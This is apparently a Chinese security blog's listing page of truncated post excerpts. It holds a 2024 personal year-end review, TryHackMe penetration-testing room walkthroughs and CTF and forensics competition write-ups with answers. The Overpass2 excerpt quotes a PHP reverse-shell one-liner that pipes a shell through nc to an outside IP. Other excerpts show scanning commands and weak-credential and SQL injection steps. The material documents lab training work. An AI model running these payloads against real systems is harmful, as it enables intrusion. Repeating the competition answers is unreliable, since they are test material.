w3nx1z1的2024年度个人总结
2024年年度总结时间过得真快 距离上一次写年度总结已经过去了一年的时间 上次写的时候自己还是一个萌新,此时已经是个快退役的老赛棍了。
今年是非常特殊的一年,记录了我和社团还有我的网安学习道路上的很多第一次、很多难忘的时刻。
今年真得是参加了很多比赛,不管是线上的还是线下的,拿了不少奖,其中很多是弥补了去年的遗憾吧。
正常的警校生活可能只能允许我在有限的紧张的假期时间去探索祖国的大好河山,因此非常感谢当初的自己可以选择学习网安这条道路,在同学们只能在苦逼的校园中度日的时候,我还能一点点的去点亮地图哈哈哈,希望新的一年里可以去更多的地方。
下面一点点来回顾这一年的时光。
2024.1还记得今年过年挺晚的 因为一些原因,刚放假就被拉去练车,当时还因为考科二没打成獬豸杯,失去一次拿奖机会哈哈哈
月底还打了西湖论剑,很遗憾的一次战斗,差一题就进了,马上这届西湖还有半个多月就要开打了,希望25年可以打到线下,真的想再去一次杭州好吧!
2024.4铁三初赛记得是三月底打的,和20届的老学长们最后一次线下并肩作战,初赛还好,记得打到了前几名。
没想到4月底的半决赛拉了,一个学长因为要考公没来,另一 ...
Offensive Pentesting-Overpass2
Offensive Pentesting-Overpass2这个room主要是一个流量分析溯源取证的 难度相对来说比较简单 同时分析完攻击行为之后 我们可以利用流量包中的记录来进行攻击靶机
Forensics - Analyse the PCAP下载下来附件是一个流量包 直接追踪tcp流
第一个流中 上传了一个反弹shell马
他们用来上传反向 shell 的页面的 URL 是什么?
/development
攻击者使用什么有效负载来获取访问权限?
<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>
第三个流中就是一个反弹到shell后执行命令的记录
也能看到使用su james命令登陆到了james用户
攻击者使用什么密码来获取权限?
whenevernoteartinstant
往后看到执行了sudo -l命令查看了当前james用户的sudo权限规则 查看哪些命令可以被执行
...
Offensive Pentesting-Alfred
Offensive Pentesting-AlfredExploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.
利用 Jenkins 获取初始 shell,然后通过利用 Windows 身份验证令牌来提升您的权限。
Initial Access先来扫目录和端口
nmap -T4 -sC -sV -Pn 10.10.118.134
可以看到tcp协议开放的端口一共有3个
How many ports are open? (TCP only)
3
下面来访问一下web服务 80端口的没啥用 直接来看8080端口 上来是一个登录框
先直接试一下弱口令:admin:admin 结果直接登上去了
What is the username and password for the login panel? (in the format username:password)
admin:admin
获取user的 ...
Offensive Pentesting-Steel Mountain
Offensive Pentesting-Steel MountainHack into a Mr. Robot themed Windows machine. Use metasploit for initial access, utilise powershell for Windows privilege escalation enumeration and learn a new technique to get Administrator access.
Introductionn this room you will enumerate a Windows machine, gain initial access with Metasploit, use Powershell to further enumerate the machine and escalate your privileges to Administrator.
If you don't have the right security tools and environment, deplo ...
2024国城杯Misc wp
2024国城杯Misc wp取证说了取证有四部分 先取证大师+火眼整一下
先看到桌面有个流量包
提出来 发现藏了一张jpg图片
提出来 放010看一下 有一串base64
解一下 提示oursecret
使用oursecret来解密 提出来一个hidden.txt
提示QQ空间 正好上面流量是QQ的OICQ协议流量 发现直接给了一个QQ号
搜索一下 在QQ空间说说中找到密文
直接aes-ecb解 拿到flag1
在压缩文件中找到一个flag4
可以直接解压 exe放沙箱里面分析一下
用pyinstxtractor解包 找到关键的pyc文件
在线反编译 拿到加密代码
写出解密代码
def xor_decrypt(encrypted_data, key):
decrypted_data = bytearray()
for i in range(len(encrypted_data)):
decrypted_data.append(encrypted_data[i] ^ key[i % len(key)])
return ...
2024第一届数证杯决赛——个人赛
数证杯决赛——个人赛容器挂载密码:
4zL!$WpRkmANv@XFQ#7HdEyU&GpoTb56YZ^Jq83!Wr(tqA%XsPB7f@CY1xRmKH9#Le*WVG9NuvT$kJ2@7b64Tp(FLM#zqRY8Hv%!KU^9C&YXL*powq87Hr
检材下载链接:
链接:https://pan.baidu.com/s/12ZZnIfc7ifYoTNi9H8ZqsA?pwd=5g81
提取码:5g81
计算机部分1. [填空题]计算机中曾挂载的Bitlocker加密分区的恢复密钥后6位为?(答案格式:6位数字) (1分)
700755
2. [填空题]请写出曾远程连接过该计算机的IP;(答案格式:6.6.6.6) (1分)
192.168.50.227
3. [填空题]计算机中曾挂载的vhd非加密分区驱动器号为?(答案格式:大写,如D) (1分)
M
发现计算机中一共有两个vhd虚拟磁盘
仿真起计算机 尝试挂载一下两个虚拟磁盘 发现这个996600.vhd可以直接挂载 挂载后盘符是M
而另一个338899挂载上是被bitl ...
2024第一届数证杯初赛wp(计算机、手机、流量分析部分)
2024第一届数证杯(计算机、手机、流量分析部分)计算机取证1.对计算机镜像进行分析,计算该镜像中ESP分区的SM3值后8位为?(答案格式:大写字母与数字组合,如:D23DDF44) (2分)
ai搜一下ESP分区的特征
找到并计算出SM3值
后八位为
BDBE1073
2.对计算机镜像进行分析,该操作系统超管账户最后一次注销时间为?(时区为UTC+08:00)(答案格式如:1970-01-01 00:00:00) (2分)
2024-10-25 22:57:32
3.对计算机镜像进行分析,该操作系统超管账户有记录的登录次数为?(填写数字,答案格式如:1234) (2分)
24
4.对计算机镜像进行分析,该操作系统设置的账户密码最长存留期为多少天?(填写数字,答案格式如:1234) (2分)
42
5.对计算机镜像进行分析,该操作系统安装的数据擦除软件的版本为?(答案格式:1.23) (2分)
5.86
6.对计算机镜像进行分析,该操作系统接入过一名称为“Realtek USB Disk autorun USB Device”的USB设备,其接入时分配 ...
Offensive Pentesting-DailyBugle
Offensive Pentesting-DailyBugleCompromise a Joomla CMS account via SQLi, practise cracking hashes and escalate your privileges by taking advantage of yum.
通过 SQLi 入侵 Joomla CMS 帐户,练习破解哈希并利用 yum 提升您的权限。
信息搜集nmap -T4 -sC -sV --script=vuln 10.10.46.209
开放22 80 3306端口 其中80端口开放的网站服务是使用joomla框架搭建的
whatweb看一下 没啥有用的
joomla框架的话 用joomlascan扫一下 找到版本为3.7.0
What is the Joomla version?
3.7.0
然后访问一下网页 看到一则银行被抢劫的新闻 作案人是SpiderMan
Access the web server, who robbed the bank?
SpiderMan
其实在前面我们使用Joomlascan来 ...
Offensive Pentesting-GameZone
Offensive Pentesting-GameZoneDeploy the vulnerable machine拿到靶机 先扫端口
只是开启了22端口的ssh服务和80端口的web服务
访问一下网站
What is the name of the large cartoon avatar holding a sniper on the forum?
Agent 47
问的是背景中这个拿着狙击枪的角色是 我们把这张图单独保存出来 百度识图一下得知是《杀手》游戏中的主角
Obtain access via SQLiSQL 是一种用于在数据库中存储、编辑和检索数据的标准语言。查询可能如下所示:
SELECT * FROM users WHERE username = :username AND password := password
在我们的 GameZone 机器中,当您尝试登录时,它将从您的用户名和密码中获取您输入的值,然后将它们直接插入到上面的查询中。如果查询找到数据,您将被允许登录,否则它将显示一条错误消息。
这是一个潜在的漏洞位置,因为您可以将用户名输入为另一个 ...
Offensive Pentesting-Kenobi
Offensive Pentesting-KenobiWalkthrough on exploiting a Linux machine. Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation.
此房间将涵盖访问 Samba 共享、操纵易受攻击的 proftpd 版本以获得初始访问权限,并通过 SUID 二进制文件将您的权限升级到 root。
扫端口┌──(root㉿kali)-[/home/w3nx1z1]
└─# nmap -T4 -sV -sC 10.10.233.125
Starting Nmap 7.92 ( https://nmap.org ) at 2024-11-17 11:09 CST
Nmap scan report for 10.10.233.125
Host is up (0.27s latency).
Not shown: 993 closed tcp ...